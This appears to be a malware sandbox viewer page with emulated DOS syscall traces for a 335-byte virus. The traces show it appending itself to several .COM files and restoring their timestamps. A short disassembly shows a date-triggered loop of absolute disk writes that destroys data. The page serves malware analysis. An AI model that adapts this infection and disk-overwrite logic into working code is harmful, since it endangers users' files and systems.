Sample viewer

vx.netlux.org/Virus.DOS.KPOBOCOC.335

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:55:51.21395228Z 26 PC: 139f3 | Set disk transfer address
2018-12-17T22:55:51.215344919Z 42 PC: 13a08 | Get date 0x13a08: cmp al, 1
0x13a0a: je 0x13a0e
0x13a0c: jne 0x13a38
0x13a0e: mov byte ptr [0x248], 0
0x13a13: nop
0x13a14: jmp 0x13a17
0x13a16: nop
0x13a17: mov al, 2
0x13a19: mov cx, 0xc8
0x13a1c: mov dx, 0
0x13a1f: mov bx, 0
0x13a22: int 0x26
0x13a24: inc byte ptr [0x248]
0x13a28: cmp byte ptr [0x248], 0xa
0x13a2d: je 0x13a31
0x13a2f: jne 0x13a17
0x13a31: mov ah, 9
0x13a33: mov dx, 0x20d
0x13a36: int 0x21
0x13a38: mov dx, bp
2018-12-17T22:55:51.219128023Z 9 PC: 13a38 | Display string (String= '��r�Ɋ�� ��� Ë�ðQ�ȋF�^ �n ���J#�R*�s!�ͺ��J ������� ڃ����*͵*���J#������� ډF�^ �n XY�WR��������g��Q���6�G��YV���6�|�3ۺ�QV6:u2PSQ�ȸ��H����*����3����������+�- 6�')
2018-12-17T22:55:51.22847476Z 78 PC: 13a44 | Find first file
2018-12-17T22:55:51.23515331Z 61 PC: 13a50 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:55:51.242875502Z 63 PC: 13a61 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:51.249677824Z 66 PC: 13a7a | Move file pointer
2018-12-17T22:55:51.251185229Z 64 PC: 13a8a | Write file or device (Write 335 bytes on handle 5)
2018-12-17T22:55:51.331948009Z 66 PC: 13a95 | Move file pointer
2018-12-17T22:55:51.334467407Z 64 PC: 13ab1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:51.342114167Z 87 PC: 13abd | Get or set file date and time
2018-12-17T22:55:51.34535957Z 62 PC: 13ac1 | Close file
2018-12-17T22:55:51.354967268Z 79 PC: 13ac5 | Find next file
2018-12-17T22:55:51.358242347Z 61 PC: 13a50 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:55:51.36619386Z 63 PC: 13a61 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:51.373717739Z 66 PC: 13a7a | Move file pointer
2018-12-17T22:55:51.375473101Z 64 PC: 13a8a | Write file or device (Write 335 bytes on handle 5)
2018-12-17T22:55:51.378379647Z 66 PC: 13a95 | Move file pointer
2018-12-17T22:55:51.381131131Z 64 PC: 13ab1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:51.384018511Z 87 PC: 13abd | Get or set file date and time
2018-12-17T22:55:51.386362619Z 62 PC: 13ac1 | Close file
2018-12-17T22:55:51.404669046Z 79 PC: 13ac5 | Find next file
2018-12-17T22:55:51.407527752Z 61 PC: 13a50 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:55:51.41453537Z 63 PC: 13a61 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:51.422674937Z 66 PC: 13a7a | Move file pointer
2018-12-17T22:55:51.424179596Z 64 PC: 13a8a | Write file or device (Write 335 bytes on handle 5)
2018-12-17T22:55:51.427071505Z 66 PC: 13a95 | Move file pointer
2018-12-17T22:55:51.429316467Z 64 PC: 13ab1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:51.432660676Z 87 PC: 13abd | Get or set file date and time
2018-12-17T22:55:51.434825847Z 62 PC: 13ac1 | Close file
2018-12-17T22:55:51.443375025Z 79 PC: 13ac5 | Find next file
2018-12-17T22:55:51.446737999Z 61 PC: 13a50 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:55:51.453947738Z 63 PC: 13a61 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:51.461321264Z 66 PC: 13a7a | Move file pointer
2018-12-17T22:55:51.46338244Z 64 PC: 13a8a | Write file or device (Write 335 bytes on handle 5)
2018-12-17T22:55:51.466601724Z 66 PC: 13a95 | Move file pointer
2018-12-17T22:55:51.468644125Z 64 PC: 13ab1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:51.472252521Z 87 PC: 13abd | Get or set file date and time
2018-12-17T22:55:51.473944483Z 62 PC: 13ac1 | Close file
2018-12-17T22:55:51.481994822Z 79 PC: 13ac5 | Find next file
2018-12-17T22:55:51.48706693Z 61 PC: 13a50 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:55:51.494844176Z 63 PC: 13a61 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:51.501634776Z 66 PC: 13a7a | Move file pointer
2018-12-17T22:55:51.504457725Z 64 PC: 13a8a | Write file or device (Write 335 bytes on handle 5)
2018-12-17T22:55:51.509040683Z 66 PC: 13a95 | Move file pointer
2018-12-17T22:55:51.51081528Z 64 PC: 13ab1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:51.514688575Z 87 PC: 13abd | Get or set file date and time
2018-12-17T22:55:51.516794926Z 62 PC: 13ac1 | Close file
2018-12-17T22:55:51.524920006Z 79 PC: 13ac5 | Find next file
2018-12-17T22:55:51.528597231Z 61 PC: 13a50 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:55:51.536501876Z 63 PC: 13a61 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:51.543752632Z 66 PC: 13a7a | Move file pointer
2018-12-17T22:55:51.546750169Z 64 PC: 13a8a | Write file or device (Write 335 bytes on handle 5)
2018-12-17T22:55:51.555493942Z 66 PC: 13a95 | Move file pointer
2018-12-17T22:55:51.557005274Z 64 PC: 13ab1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:51.563951988Z 87 PC: 13abd | Get or set file date and time
2018-12-17T22:55:51.56743602Z 62 PC: 13ac1 | Close file
2018-12-17T22:55:51.575978144Z 79 PC: 13ac5 | Find next file
2018-12-17T22:55:51.578744757Z 61 PC: 13a50 | Open file (Filename = 'PAH.COM')
2018-12-17T22:55:51.586639954Z 63 PC: 13a61 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:51.593991079Z 66 PC: 13a7a | Move file pointer
2018-12-17T22:55:51.597530635Z 64 PC: 13a8a | Write file or device (Write 335 bytes on handle 5)
2018-12-17T22:55:51.60213818Z 66 PC: 13a95 | Move file pointer
2018-12-17T22:55:51.603947733Z 64 PC: 13ab1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:51.607069183Z 87 PC: 13abd | Get or set file date and time
2018-12-17T22:55:51.610043366Z 62 PC: 13ac1 | Close file
2018-12-17T22:55:51.618509968Z 79 PC: 13ac5 | Find next file
2018-12-17T22:55:51.621322156Z 61 PC: 13a50 | Open file (Filename = 'TEST.COM')
2018-12-17T22:55:51.628969387Z 63 PC: 13a61 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:51.633065731Z 66 PC: 13a7a | Move file pointer
2018-12-17T22:55:51.635254818Z 64 PC: 13a8a | Write file or device (Write 335 bytes on handle 5)
2018-12-17T22:55:51.644802563Z 66 PC: 13a95 | Move file pointer
2018-12-17T22:55:51.647942909Z 64 PC: 13ab1 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:51.651574017Z 87 PC: 13abd | Get or set file date and time
2018-12-17T22:55:51.653833627Z 62 PC: 13ac1 | Close file
2018-12-17T22:55:51.666368168Z 79 PC: 13ac5 | Find next file
2018-12-17T22:55:51.669400241Z 26 PC: 13ad1 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12029,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:50.788888059Z 26 PC: 139f3 | Set disk transfer address
2018-12-25T12:31:50.79060341Z 42 PC: 13a08 | Get date 0x13a08: cmp al, 1
0x13a0a: je 0x13a0e
0x13a0c: jne 0x13a38
0x13a0e: mov byte ptr [0x248], 0
0x13a13: nop
0x13a14: jmp 0x13a17
0x13a16: nop
0x13a17: mov al, 2
0x13a19: mov cx, 0xc8
0x13a1c: mov dx, 0
0x13a1f: mov bx, 0
0x13a22: int 0x26
0x13a24: inc byte ptr [0x248]
0x13a28: cmp byte ptr [0x248], 0xa
0x13a2d: je 0x13a31
0x13a2f: jne 0x13a17
0x13a31: mov ah, 9
0x13a33: mov dx, 0x20d
0x13a36: int 0x21
0x13a38: mov dx, bp
2018-12-25T12:31:50.793744635Z 78 PC: 13a44 | Find first file
2018-12-25T12:31:50.800206047Z 61 PC: 13a50 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:50.807730865Z 63 PC: 13a61 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:31:50.815026337Z 66 PC: 13a7a | Move file pointer
2018-12-25T12:31:50.81688984Z 64 PC: 13a8a | Write file or device (Write 335 bytes on handle 5)
2018-12-25T12:31:50.831552304Z 66 PC: 13a95 | Move file pointer
2018-12-25T12:31:50.833735649Z 64 PC: 13ab1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:31:50.840515297Z 87 PC: 13abd | Get or set file date and time
2018-12-25T12:31:50.842354174Z 62 PC: 13ac1 | Close file
2018-12-25T12:31:50.850894382Z 79 PC: 13ac5 | Find next file
2018-12-25T12:31:50.85364299Z 61 PC: 13a50 | Open file (See above)
2018-12-25T12:31:50.86010329Z 63 PC: 13a61 | Read file or device (See above)
2018-12-25T12:31:50.866987868Z 66 PC: 13a7a | Move file pointer (See above)
2018-12-25T12:31:50.869225582Z 64 PC: 13a8a | Write file or device (See above)
2018-12-25T12:31:50.872244162Z 66 PC: 13a95 | Move file pointer (See above)
2018-12-25T12:31:50.874519472Z 64 PC: 13ab1 | Write file or device (See above)
2018-12-25T12:31:50.877788089Z 87 PC: 13abd | Get or set file date and time (See above)
2018-12-25T12:31:50.880248161Z 62 PC: 13ac1 | Close file (See above)
2018-12-25T12:31:50.887732824Z 79 PC: 13ac5 | Find next file (See above)
2018-12-25T12:31:50.890844349Z 61 PC: 13a50 | Open file (See above)
2018-12-25T12:31:50.897329046Z 63 PC: 13a61 | Read file or device (See above)
2018-12-25T12:31:50.904454177Z 66 PC: 13a7a | Move file pointer (See above)
2018-12-25T12:31:50.905879606Z 64 PC: 13a8a | Write file or device (See above)
2018-12-25T12:31:50.90844897Z 66 PC: 13a95 | Move file pointer (See above)
2018-12-25T12:31:50.91070752Z 64 PC: 13ab1 | Write file or device (See above)
2018-12-25T12:31:50.913509075Z 87 PC: 13abd | Get or set file date and time (See above)
2018-12-25T12:31:50.915230158Z 62 PC: 13ac1 | Close file (See above)
2018-12-25T12:31:50.922632344Z 79 PC: 13ac5 | Find next file (See above)
2018-12-25T12:31:50.92587329Z 61 PC: 13a50 | Open file (See above)
2018-12-25T12:31:50.932575327Z 63 PC: 13a61 | Read file or device (See above)
2018-12-25T12:31:50.939079317Z 66 PC: 13a7a | Move file pointer (See above)
2018-12-25T12:31:50.941757573Z 64 PC: 13a8a | Write file or device (See above)
2018-12-25T12:31:50.944632304Z 66 PC: 13a95 | Move file pointer (See above)
2018-12-25T12:31:50.946049311Z 64 PC: 13ab1 | Write file or device (See above)
2018-12-25T12:31:50.950649749Z 87 PC: 13abd | Get or set file date and time (See above)
2018-12-25T12:31:50.95217017Z 62 PC: 13ac1 | Close file (See above)
2018-12-25T12:31:50.959696809Z 79 PC: 13ac5 | Find next file (See above)
2018-12-25T12:31:50.962990244Z 61 PC: 13a50 | Open file (See above)
2018-12-25T12:31:50.969620855Z 63 PC: 13a61 | Read file or device (See above)
2018-12-25T12:31:50.976053635Z 66 PC: 13a7a | Move file pointer (See above)
2018-12-25T12:31:50.978653462Z 64 PC: 13a8a | Write file or device (See above)
2018-12-25T12:31:50.981522035Z 66 PC: 13a95 | Move file pointer (See above)
2018-12-25T12:31:50.982940881Z 64 PC: 13ab1 | Write file or device (See above)
2018-12-25T12:31:50.985681899Z 87 PC: 13abd | Get or set file date and time (See above)
2018-12-25T12:31:50.987186643Z 62 PC: 13ac1 | Close file (See above)
2018-12-25T12:31:50.994149785Z 79 PC: 13ac5 | Find next file (See above)
2018-12-25T12:31:50.997034439Z 61 PC: 13a50 | Open file (See above)
2018-12-25T12:31:51.003535821Z 63 PC: 13a61 | Read file or device (See above)
2018-12-25T12:31:51.009673358Z 66 PC: 13a7a | Move file pointer (See above)
2018-12-25T12:31:51.01170651Z 64 PC: 13a8a | Write file or device (See above)
2018-12-25T12:31:51.019878221Z 66 PC: 13a95 | Move file pointer (See above)
2018-12-25T12:31:51.021126275Z 64 PC: 13ab1 | Write file or device (See above)
2018-12-25T12:31:51.028189309Z 87 PC: 13abd | Get or set file date and time (See above)
2018-12-25T12:31:51.029610491Z 62 PC: 13ac1 | Close file (See above)
2018-12-25T12:31:51.037552585Z 79 PC: 13ac5 | Find next file (See above)
2018-12-25T12:31:51.040203865Z 61 PC: 13a50 | Open file (See above)
2018-12-25T12:31:51.047528237Z 63 PC: 13a61 | Read file or device (See above)
2018-12-25T12:31:51.053969005Z 66 PC: 13a7a | Move file pointer (See above)
2018-12-25T12:31:51.055264216Z 64 PC: 13a8a | Write file or device (See above)
2018-12-25T12:31:51.057950672Z 66 PC: 13a95 | Move file pointer (See above)
2018-12-25T12:31:51.059410393Z 64 PC: 13ab1 | Write file or device (See above)
2018-12-25T12:31:51.062051053Z 87 PC: 13abd | Get or set file date and time (See above)
2018-12-25T12:31:51.064471595Z 62 PC: 13ac1 | Close file (See above)
2018-12-25T12:31:51.071654061Z 79 PC: 13ac5 | Find next file (See above)
2018-12-25T12:31:51.074416691Z 61 PC: 13a50 | Open file (See above)
2018-12-25T12:31:51.08258421Z 63 PC: 13a61 | Read file or device (See above)
2018-12-25T12:31:51.085334935Z 66 PC: 13a7a | Move file pointer (See above)
2018-12-25T12:31:51.08682438Z 64 PC: 13a8a | Write file or device (See above)
2018-12-25T12:31:51.092827174Z 66 PC: 13a95 | Move file pointer (See above)
2018-12-25T12:31:51.093929461Z 64 PC: 13ab1 | Write file or device (See above)
2018-12-25T12:31:51.095805563Z 87 PC: 13abd | Get or set file date and time (See above)
2018-12-25T12:31:51.097819326Z 62 PC: 13ac1 | Close file (See above)
2018-12-25T12:31:51.102842359Z 79 PC: 13ac5 | Find next file (See above)
2018-12-25T12:31:51.104455938Z 26 PC: 13ad1 | Set disk transfer address
2018-12-25T12:31:51.107954834Z 74 PC: 12a64 | Reallocate memory
2018-12-25T12:31:51.109087142Z 72 PC: 1382e | Allocate memory
2018-12-25T12:31:51.110285049Z 72 PC: 1382e | Allocate memory (See above)
2018-12-25T12:31:51.112009015Z 72 PC: 1382e | Allocate memory (See above)

{"DateBased":true,"Day":7,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12029,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:50.902388972Z 26 PC: 139f3 | Set disk transfer address
2018-12-25T12:31:50.904630767Z 42 PC: 13a08 | Get date 0x13a08: cmp al, 1
0x13a0a: je 0x13a0e
0x13a0c: jne 0x13a38
0x13a0e: mov byte ptr [0x248], 0
0x13a13: nop
0x13a14: jmp 0x13a17
0x13a16: nop
0x13a17: mov al, 2
0x13a19: mov cx, 0xc8
0x13a1c: mov dx, 0
0x13a1f: mov bx, 0
0x13a22: int 0x26
0x13a24: inc byte ptr [0x248]
0x13a28: cmp byte ptr [0x248], 0xa
0x13a2d: je 0x13a31
0x13a2f: jne 0x13a17
0x13a31: mov ah, 9
0x13a33: mov dx, 0x20d
0x13a36: int 0x21
0x13a38: mov dx, bp
2018-12-25T12:31:50.908640228Z 9 PC: 13a38 | Display string (String= '��r�Ɋ�� ��� Ë�ðQ�ȋF�^ �n ���J#�R*�s!�ͺ��J ������� ڃ����*͵*���J#������� ډF�^ �n XY�WR��������g��Q���6�G��YV���6�|�3ۺ�QV6:u2PSQ�ȸ��H����*����3����������+�- 6�')
2018-12-25T12:31:50.914867132Z 78 PC: 13a44 | Find first file
2018-12-25T12:31:50.923471696Z 61 PC: 13a50 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:50.928362116Z 63 PC: 13a61 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:31:50.932903093Z 66 PC: 13a7a | Move file pointer
2018-12-25T12:31:50.934023072Z 64 PC: 13a8a | Write file or device (Write 335 bytes on handle 5)
2018-12-25T12:31:51.272226005Z 66 PC: 13a95 | Move file pointer
2018-12-25T12:31:51.274222782Z 64 PC: 13ab1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:31:51.282229987Z 87 PC: 13abd | Get or set file date and time
2018-12-25T12:31:51.285514866Z 62 PC: 13ac1 | Close file
2018-12-25T12:31:51.294167275Z 79 PC: 13ac5 | Find next file
2018-12-25T12:31:51.297112542Z 61 PC: 13a50 | Open file (See above)
2018-12-25T12:31:51.306559722Z 63 PC: 13a61 | Read file or device (See above)
2018-12-25T12:31:51.313766381Z 66 PC: 13a7a | Move file pointer (See above)
2018-12-25T12:31:51.31584178Z 64 PC: 13a8a | Write file or device (See above)
2018-12-25T12:31:51.319657117Z 66 PC: 13a95 | Move file pointer (See above)
2018-12-25T12:31:51.322708864Z 64 PC: 13ab1 | Write file or device (See above)
2018-12-25T12:31:51.326029027Z 87 PC: 13abd | Get or set file date and time (See above)
2018-12-25T12:31:51.333296738Z 62 PC: 13ac1 | Close file (See above)
2018-12-25T12:31:51.344457561Z 79 PC: 13ac5 | Find next file (See above)
2018-12-25T12:31:51.347497951Z 61 PC: 13a50 | Open file (See above)
2018-12-25T12:31:51.355881447Z 63 PC: 13a61 | Read file or device (See above)
2018-12-25T12:31:51.367290133Z 66 PC: 13a7a | Move file pointer (See above)
2018-12-25T12:31:51.369696303Z 64 PC: 13a8a | Write file or device (See above)
2018-12-25T12:31:51.373024172Z 66 PC: 13a95 | Move file pointer (See above)
2018-12-25T12:31:51.375761876Z 64 PC: 13ab1 | Write file or device (See above)
2018-12-25T12:31:51.379349556Z 87 PC: 13abd | Get or set file date and time (See above)
2018-12-25T12:31:51.381416705Z 62 PC: 13ac1 | Close file (See above)
2018-12-25T12:31:51.390007035Z 79 PC: 13ac5 | Find next file (See above)
2018-12-25T12:31:51.394150269Z 61 PC: 13a50 | Open file (See above)
2018-12-25T12:31:51.401610472Z 63 PC: 13a61 | Read file or device (See above)
2018-12-25T12:31:51.408944891Z 66 PC: 13a7a | Move file pointer (See above)
2018-12-25T12:31:51.412090499Z 64 PC: 13a8a | Write file or device (See above)
2018-12-25T12:31:51.416136147Z 66 PC: 13a95 | Move file pointer (See above)
2018-12-25T12:31:51.417786925Z 64 PC: 13ab1 | Write file or device (See above)
2018-12-25T12:31:51.421280416Z 87 PC: 13abd | Get or set file date and time (See above)
2018-12-25T12:31:51.422896786Z 62 PC: 13ac1 | Close file (See above)
2018-12-25T12:31:51.430772687Z 79 PC: 13ac5 | Find next file (See above)
2018-12-25T12:31:51.434296925Z 61 PC: 13a50 | Open file (See above)
2018-12-25T12:31:51.441334032Z 63 PC: 13a61 | Read file or device (See above)
2018-12-25T12:31:51.448030807Z 66 PC: 13a7a | Move file pointer (See above)
2018-12-25T12:31:51.450431054Z 64 PC: 13a8a | Write file or device (See above)
2018-12-25T12:31:51.453393519Z 66 PC: 13a95 | Move file pointer (See above)
2018-12-25T12:31:51.454897147Z 64 PC: 13ab1 | Write file or device (See above)
2018-12-25T12:31:51.458403654Z 87 PC: 13abd | Get or set file date and time (See above)
2018-12-25T12:31:51.460175564Z 62 PC: 13ac1 | Close file (See above)
2018-12-25T12:31:51.468066993Z 79 PC: 13ac5 | Find next file (See above)
2018-12-25T12:31:51.471679754Z 61 PC: 13a50 | Open file (See above)
2018-12-25T12:31:51.478854064Z 63 PC: 13a61 | Read file or device (See above)
2018-12-25T12:31:51.48612012Z 66 PC: 13a7a | Move file pointer (See above)
2018-12-25T12:31:51.487722848Z 64 PC: 13a8a | Write file or device (See above)
2018-12-25T12:31:51.496606979Z 66 PC: 13a95 | Move file pointer (See above)
2018-12-25T12:31:51.498083335Z 64 PC: 13ab1 | Write file or device (See above)
2018-12-25T12:31:51.505130708Z 87 PC: 13abd | Get or set file date and time (See above)
2018-12-25T12:31:51.507427671Z 62 PC: 13ac1 | Close file (See above)
2018-12-25T12:31:51.515719478Z 79 PC: 13ac5 | Find next file (See above)
2018-12-25T12:31:51.518382133Z 61 PC: 13a50 | Open file (See above)
2018-12-25T12:31:51.525780085Z 63 PC: 13a61 | Read file or device (See above)
2018-12-25T12:31:51.532578201Z 66 PC: 13a7a | Move file pointer (See above)
2018-12-25T12:31:51.533880991Z 64 PC: 13a8a | Write file or device (See above)
2018-12-25T12:31:51.537701287Z 66 PC: 13a95 | Move file pointer (See above)
2018-12-25T12:31:51.539093277Z 64 PC: 13ab1 | Write file or device (See above)
2018-12-25T12:31:51.541694245Z 87 PC: 13abd | Get or set file date and time (See above)
2018-12-25T12:31:51.543723592Z 62 PC: 13ac1 | Close file (See above)
2018-12-25T12:31:51.552218438Z 79 PC: 13ac5 | Find next file (See above)
2018-12-25T12:31:51.555113642Z 61 PC: 13a50 | Open file (See above)
2018-12-25T12:31:51.562456085Z 63 PC: 13a61 | Read file or device (See above)
2018-12-25T12:31:51.565621739Z 66 PC: 13a7a | Move file pointer (See above)
2018-12-25T12:31:51.567041557Z 64 PC: 13a8a | Write file or device (See above)
2018-12-25T12:31:51.575885971Z 66 PC: 13a95 | Move file pointer (See above)
2018-12-25T12:31:51.578247003Z 64 PC: 13ab1 | Write file or device (See above)
2018-12-25T12:31:51.581216854Z 87 PC: 13abd | Get or set file date and time (See above)
2018-12-25T12:31:51.582691595Z 62 PC: 13ac1 | Close file (See above)
2018-12-25T12:31:51.59172117Z 79 PC: 13ac5 | Find next file (See above)
2018-12-25T12:31:51.594433172Z 26 PC: 13ad1 | Set disk transfer address